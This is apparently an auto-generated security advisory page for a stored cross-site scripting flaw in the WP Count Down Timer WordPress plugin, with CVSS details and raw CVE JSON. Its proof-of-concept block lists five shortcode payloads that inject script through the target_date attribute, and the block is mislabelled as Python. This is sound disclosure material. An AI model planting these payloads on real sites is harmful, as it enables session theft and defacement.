Security Vulnerability Report
中文
CVE-2025-12668 CVSS 6.4 MEDIUM

CVE-2025-12668

Published: 2025-11-11 04:15:49
Last Modified: 2026-04-15 00:35:42

Description

The WP Count Down Timer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters of the 'wp_countdown_timer' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Count Down Timer插件 <= 1.0.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- WordPress WP Count Down Timer <= 1.0.1 Stored XSS PoC --> <!-- Requires Contributor-level privileges or higher --> <!-- Method 1: Using script tag --> [wp_countdown_timer target_date='<script>alert(document.cookie)</script>'] <!-- Method 2: Using event handler --> [wp_countdown_timer target_date='" onerror="alert(document.cookie)" x='] <!-- Method 3: Using img onerror --> [wp_countdown_timer target_date='<img src=x onerror=alert(String.fromCharCode(88,83,83))>'] <!-- Method 4: Using body onload --> [wp_countdown_timer target_date='<body onload=alert(document.domain)>'] <!-- Method 5: Using SVG onload --> [wp_countdown_timer target_date='<svg/onload=alert(localStorage.getItem("wp_auth"))>']

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12668", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:49.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Count Down Timer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters of the 'wp_countdown_timer' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-count-down-timer/tags/1.0.1/wp-count-down-timer.php#L69", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/wp-count-down-timer/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcbcad73-ce2a-4eb2-9b7f-91d47a93e16d?source=cve", "source": "[email protected]"}]}}